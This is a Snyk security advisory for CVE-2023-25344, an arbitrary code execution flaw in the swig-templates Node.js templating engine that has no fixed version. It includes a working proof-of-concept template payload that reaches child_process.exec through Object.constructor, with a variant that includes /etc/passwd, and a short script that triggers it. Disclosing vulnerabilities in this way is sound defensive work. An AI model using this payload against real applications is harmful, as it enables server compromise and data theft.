Arbitrary Code Execution Affecting swig-templates package, versions *
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-SWIGTEMPLATES-3266806
- published 7 Mar 2023
- disclosed 2 Feb 2023
- credit y1nglamore
Introduced: 2 Feb 2023
CVE-2023-25344 Open this link in a new tabHow to fix?
There is no fixed version for swig-templates.
Overview
swig-templates is an A simple, powerful, and extendable templating engine for node.js and browsers, similar to Django, Jinja2, and Twig.
Affected versions of this package are vulnerable to Arbitrary Code Execution via the renderFile method.
Note: The following conditions are required to exploit the vulnerability:
User input is used in the context of the package.
User input is not sanitized.
The value is dynamic.
PoC
// tpl.html
You need to ensure that the 1.html file exists
{% include "./1.html"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %}
or just use /etc/passwd
{% include "/etc/passwd"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %}
// run.js
var swig = require('swig-templates');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);